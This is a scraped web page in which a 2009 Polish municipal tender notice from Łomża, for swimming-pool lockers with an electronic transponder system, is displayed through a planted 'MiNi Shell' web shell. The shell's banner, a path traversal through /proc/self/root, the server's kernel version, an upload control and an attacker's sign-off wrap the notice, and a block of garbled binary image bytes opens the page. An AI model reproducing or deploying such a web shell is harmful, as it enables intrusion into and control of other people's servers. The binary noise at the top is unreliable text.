JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091007/350196-N-2009.html

<p class="kh_header"><b>Łomża: Dostawa oraz montaż szafek ubraniowych basenowych z płyty HPL wraz z systemem sterowania elektronicznego szafek  na potrzeby Basenu przy SP 10 w Łomży</b><br>
<b>Numer ogłoszenia: 350196 - 2009; data zamieszczenia: 07.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łomża , pl. Stary Rynek 14, 18-400 Łomża, woj. podlaskie, tel. 086 2156711, faks 086 2156706.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://um.lomza.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oraz montaż szafek ubraniowych basenowych z płyty HPL wraz z systemem sterowania elektronicznego szafek  na potrzeby Basenu przy SP 10 w Łomży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa oraz montaż szafek ubraniowych basenowych z płyty HPL wraz z systemem sterowania elektronicznego szafek basenowych na potrzeby Basenu przy SP 10 w Łomży, w ilości i asortymencie  zgodnie z poniższym opisem: 



I.	Szafki typu 2S dla dwóch osób (62 zestawy - 2x31) bez siedziska ze sterowaniem elektronicznym. Konstrukcja szafki: stelaż ze stali nierdzewnej, drzwiczki, podstawa, ściany boczne i tylna, góra szafki wykonane z wysokiej jakości materiału HPL, o grubości min. 10mm, charakteryzującym się wysoką odpornością na zginanie, rozrywanie, wysoką twardością powierzchni, odpornością na zabrudzenia, odpornością termiczną (wrząca woda, żar papierosa). Zawiasy wykonane ze stali nierdzewnej, niedostępne z zewnątrz. Wysokość całkowita szafek min.1800mm, szerokość min.300mm, głębokość min. 460mm, na stelażu o wysokości min.120mm z możliwością regulacji. Szafka wyposażona w obrotowy wieszak sufitowy, wieszak ubraniowy , otwierana za pomocą transponderów typu uniqe na rękę oraz kart. Szafki wyposażone w uchwyt umożliwiający otwarcie drzwi. Szafki trwale numerowane z wysokością cyfr min. 50mm w systemie M01 do M62 oraz K01 do K62.
Kolorystyka: do uzgodnienia z zamawiającym.

II.	Ławki 10 szt. o wymiarach: długość min.1400mm szerokości 400mm (6 szt.) długość min. 2000mm szerokość 400mm (4 szt.) wykonane z wysokiej jakości materiału HPL, o grubości min. 10mm, charakteryzującym się wysoką odpornością na zginanie, rozrywanie, wysoką twardością powierzchni, odpornością na zabrudzenia, odpornością termiczną (wrząca woda, żar papierosa) na stelażu ze stali nierdzewnej o wysokości 400mm.

III.	Szafki dla 4 osób niepełnosprawnych w zestawie (1 komplet). Konstrukcja szafki: stelaż ze stali nierdzewnej, drzwiczki, podstawa, ściany boczne i tylna, góra szafki wykonane z wysokiej jakości materiału HPL, o grubości min. 10mm, charakteryzującym się wysoką odpornością na zginanie, rozrywanie, wysoką twardością powierzchni, odpornością na zabrudzenia, odpornością termiczną (wrząca woda, żar papierosa).  Zawiasy wykonane ze stali nierdzewnej, niedostępne z zewnątrz. Wysokość całkowita szafki min. 1200mm, szerokość min. 550mm, głębokość min.  480mm, na stelażu o wysokości 400mm z możliwością regulacji. Szafka wyposażona w obrotowy wieszak sufitowy, wieszak ubraniowy, zamek cylindryczny z dwoma kluczami oraz paski do kluczy.
Kolorystyka: do uzgodnienia z zamawiającym.

IV.	Szafki depozytowe po 5 szt. w zestawie (3 komplety). Szafka wyposażona w zamek wrzutowy. Konstrukcja szafki: stelaż ze stali nierdzewnej, drzwiczki, podstawa, ściany boczne i tylna, góra szafki wykonane z wysokiej jakości materiału HPL, o grubości min. 10mm, charakteryzującym się wysoką odpornością na zginanie, rozrywanie, wysoką twardością powierzchni, odpornością na zabrudzenia, odpornością termiczną (wrząca woda, żar papierosa).  Zawiasy wykonane ze stali nierdzewnej, niedostępne z zewnątrz. Wysokość całkowita szafki 100mm, szerokość 455mm, głębokość 320mm, na stelażu o wysokości 120mm z możliwością regulacji.
Kolorystyka: do uzgodnienia z zamawiającym.

V.	Szafki ubraniowe dla ratowników - 10 sztuk. Szafka dzielona, wyposażona w 2 obrotowe wieszak sufitowy, 2 wieszaki ubraniowe, półkę górną, zamek cylindryczny z dwoma kluczami. Konstrukcja szafki: stelaż ze stali nierdzewnej, drzwiczki, podstawa, ściany boczne i tylna, góra szafki wykonane z wysokiej jakości materiału HPL, o grubości min. 10mm, charakteryzującym się wysoką odpornością na zginanie, rozrywanie, wysoką twardością powierzchni, odpornością na zabrudzenia, odpornością termiczną (wrząca woda, żar papierosa).  Zawiasy wykonane ze stali nierdzewnej, niedostępne z zewnątrz. Wysokość całkowita szafki min.1880mm, szerokość min.450mm, głębokość min 420mm, na stelażu o wysokości min.120mm z możliwością regulacji.
Kolorystyka: do uzgodnienia z zamawiającym.

VI.	Szafki na klucze jednodrzwiowa min 120 kluczy - 2 szt. Konstrukcja szafki: wykonana z blachy o grubości do 1,2 mm, malowana proszkowo. Szafka wyposażona w zamek cylindryczny z dwoma kluczami.

VII.	Szafki na klucze jednodrzwiowa min. 80 kluczy - 2 szt. Konstrukcja szafki: wykonana z blachy o grubości do 1,2 mm, malowana proszkowo. Szafka wyposażona w zamek cylindryczny z dwoma kluczami.

VIII.	Elektroniczny system otwierania szafek basenowych z wykorzystaniem elektrozaczepów lub zamków elektromagnetycznych z możliwością otwarcie szafki przy braku napięcia lub awarii czytnika. Zainstalowany system elektroniczny musi współdziałać z transponderami typu uniqe. Oprogramowanie sterowników ma być zlokalizowane w dwóch komputerach wskazanym przez zamawiającego i ma umożliwiać programowanie transponderów typu uniqe oraz czytników. Podłączenie elektryczne szafek ze wskazanej rozdzielni przez inspektora nadzoru YDY 5x 2,5 dł 25mb.-linia nn oraz wykonanie sieci  systemowej dla całego układu szafek. Sterowanie układem elektronicznym 24V.System ma umożliwiać podłączenie większej liczby szafek przy rozbudowie szatni. Szafki otwierane za pomocą transpondera typu uniqe lub karty przydzielonego do danej szafki oznakowany numerycznie od 01 do 120 z możliwością zaprogramowania 1 transpondera typu uniqe i 1 karty do otwarcia większej liczby szafek jednocześnie. Czytniki wodoodporne, odporne na uderzenia i uszkodzenia mechaniczne. Czytniki mogą być zainstalowane osobno na każdej szafce lub grupowo.
Przystosowanie i zapewnienie współpracy wszystkich urządzeń z Elektronicznym  Systemem Obsługi Klienta firmy TT Soft zainstalowanym na obiekcie. Dostosowanie elektronicznego systemu otwierania szafek, do systemu, umożliwiającego programowanie szafek za pomocą PC.

IX.	Czytnik programowany STOP powodujący wstrzymanie naliczania czasu pobytu na basenie na okres zaprogramowany przez zamawiającego. Zainstalowany system elektroniczny musi współdziałać z transponderami typu uniqe. Przystosowanie i zapewnienie współpracy wszystkich urządzenia z Elektronicznym  Systemem Obsługi Klienta firmy TT Soft zainstalowanym na obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 35.15.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wnosi wadium w wysokości: 1 800 zł.Wadium wnosi się przed upływem terminu składania ofert, tj. najpóźniej do 16.10.2009r. do godz. 11:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 

1/  Posiadają  uprawnienia  do  wykonywania określonej działalności lub czynności w zakresie objętym zamówieniem, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2/ Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3/ Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4/ Nie podlegają wykluczeniu z postępowania na podstawie art.24.ustawy.

- Na potwierdzenie spełniania ww. warunków Zamawiający wymaga złożenia przez Wykonawców pisemnych oświadczeń i dokumentów, określonych w pkt. 6  SIWZ.  
- Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie oświadczeń dokumentów, dostarczonych przez Wykonawców wg formuły spełnia / nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
- Ocena spełniania warunków udziału w postępowaniu przez podmiot oferty wspólnej (konsorcjum) będzie dokonana na podstawie dokumentów dołączonych do oferty, które są wymagane od podmiotu wiodącego i każdego uczestnika konsorcjum (szczegółowo wymienione w pkt. 6.1. Ocena spełniania posiadania niezbędnego potencjału ekonomicznego oraz dysponowania potencjałem technicznym oraz osobami, zdolnymi do wykonania zamówienia będzie dokonana po zsumowaniu potencjałów ekonomicznego i technicznego uczestników konsorcjum oraz osób personelu kierowniczego przewidzianych do uczestnictwa w wykonaniu zamówienia, którymi dysponują łącznie uczestnicy konsorcjum. W przypadku oceny posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia konieczne jest, aby przynajmniej jeden z uczestników  konsorcjum spełnił to wymaganie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt.5.1 SIWZ,  Wykonawca składa - wraz z ofertą, sporządzoną ściśle wg  załącznika nr 1 - następujące dokumenty, oświadczenia i informacje:
1)	oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy, z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;

/w celu potwierdzenia warunków: posiadania uprawnień do wykonywania określonej działalności lub czynności oraz nie podlegania wykluczeniu z postępowania o udzielenie zamówienia publicznego:

2)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert - złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę;

/w celu potwierdzenia warunku posiadania niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym/:

3)	wykaz wykonanych dostaw w ciągu ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch  dostaw odpowiadającej swoim rodzajem dostawom, stanowiącym przedmiot zamówienia w zakresie szafek basenowych z systemem elektronicznym oraz dołączy dokumenty (np. referencje, protokoły odbioru ) - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę- potwierdzające, że zamówienia te zostały wykonane należycie sporządzony zgodnie z  załącznikiem  nr 3 do SIWZ,

/w celu potwierdzenia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia publicznego/:

4)	oświadczenie, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej przez siebie działalności na kwotę 50 000,0zł.
Powyższe oświadczenie może być złożone z wykorzystaniem wzoru - załącznik nr 2 do SIWZ;

2.  Pozostałe wymagane dokumenty jako załączniki do oferty

1) Kalkulacja ceny oferty, zawierająca koszt poszczególnych elementów dostawy  z uwzględnieniem zakresu w pkt.12  niniejszej specyfikacji. Kalkulację należy sporządzić zgodnie z załącznikiem nr 4.
2) Dokument stwierdzający dokonanie wpłaty wadium. Potwierdzenie wpłaty w pieniądzu oraz inne dokumenty podlegające zwrotowi (np. gwarancje ubezpieczeniowe) należy wpiąć w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania firmy. Oryginały dokumentów (oprócz przelewów bankowych) należy załączyć do oferty bez trwałego ich spięcia z pozostałymi dokumentami oferty.
3) Dokument gwarancji jakości zgodnie z załącznikiem nr 6 do SIWZ.
4) W przypadku zatrudnienia podwykonawcy przy realizacji zamówienia,   wskazanie rzeczowego i finansowego zakresu prac, które podwykonawca będzie wykonywał dla wykonawcy.


Uwaga:

Do formy i treści dokumentów, składanych przez wykonawców, mających siedzibę lub miejsce zamieszkania za granicą stosuje się odpowiednio § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich dokumenty mogą być składane (Dz. U. z dnia 24 maja  2006r.,Nr 87, poz. 605 i Dz. U. z 2008 r., Nr 87, poz. 605 )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lomza.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łomży,
 ul. Stary Rynek 14 
18-400 Łomża
pokoju nr 217  II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2009 godzina 11:00, miejsce: Urząd Miejski w Łomży,
 ul. Stary Rynek 14 
18-400 Łomża
pokoju nr 101 (sekretariat) I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com